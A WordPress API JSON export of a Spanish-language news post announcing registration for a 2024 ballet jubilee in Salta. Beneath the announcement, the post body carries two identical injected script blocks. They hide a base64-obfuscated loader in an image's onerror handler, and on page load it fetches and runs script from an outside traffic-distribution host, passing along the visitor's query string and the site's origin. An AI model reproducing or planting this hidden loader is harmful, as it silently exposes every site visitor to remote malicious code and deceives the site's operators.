{"id":4214,"date":"2024-07-23T09:58:00","date_gmt":"2024-07-23T12:58:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4214"},"modified":"2025-08-13T23:52:26","modified_gmt":"2025-08-14T02:52:26","slug":"inscripciones-para-formar-parte-del-jubileo-de-la-danza-2024","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4214","title":{"rendered":"Inscripciones para formar parte del Jubileo de la Danza 2024"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-fdcc17747520832831a95785ebb6fc20\" style=\"background-color:#600219\"><em>La Escuela Oficial de Ballet, junto al Instituto de M\u00fasica y Danza de la Provincia, invitan a participar del evento, que se realizar\u00e1 durante el mes de septiembre.<\/em><\/h3>\n\n\n\n<p>Con motivo de la realizaci\u00f3n del Jubileo de la Danza 2024, que se realizar\u00e1 el 20 de septiembre, la&nbsp;<strong>Escuela Oficial de Ballet, junto al Instituto de M\u00fasica y Danza de la Provincia<\/strong>, invita a todas las academias y estudios a participar de la celebraci\u00f3n de la belleza del ballet y festejar bailando el amor por la danza.<\/p>\n\n\n\n<p>Podr\u00e1n participar de manera gratuita ni\u00f1os, j\u00f3venes y adultos. Los trabajos pueden ser individuales o grupales, &nbsp;en las modalidades Cl\u00e1sico, Contempor\u00e1neo o &nbsp;Jazz.<\/p>\n\n\n\n<p>La fiesta de la danza tendr\u00e1 lugar, en el Teatro Provincial, &nbsp;Zuvir\u00eda 70. Las inscripciones se recibir\u00e1n hasta el &nbsp;viernes 31 de Julio, de manera libre y gratuita.<\/p>\n\n\n\n<p>La postulaciones pueden formularse, a trav\u00e9s de del correo electr\u00f3nico de la Escuela Oficial:&nbsp;<a href=\"https:\/\/www.salta.gob.ar\/%C2%A0escuelaoficialdeballet@culturasalta.gov.ar.\">escuelaoficialdeballet@culturasalta.gov.ar.<\/a>&nbsp;En \u00e9l se detallar\u00e1n el nombre del estudio\/academia; nombre del responsable y un numero de celular, habilitado para comunicarse v\u00eda WhatsApp.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Escuela Oficial de Ballet, junto al Instituto de M\u00fasica y Danza de la Provincia, invitan a participar del evento, que se realizar\u00e1 durante el mes de septiembre. Con motivo de la realizaci\u00f3n del Jubileo de la Danza 2024, que se realizar\u00e1 el 20 de septiembre, la&nbsp;Escuela Oficial de Ballet, junto al Instituto de M\u00fasica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4215,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-4214","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4214"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4214"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4214\/revisions"}],"predecessor-version":[{"id":6736,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4214\/revisions\/6736"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4215"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4214"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4214"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4214"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}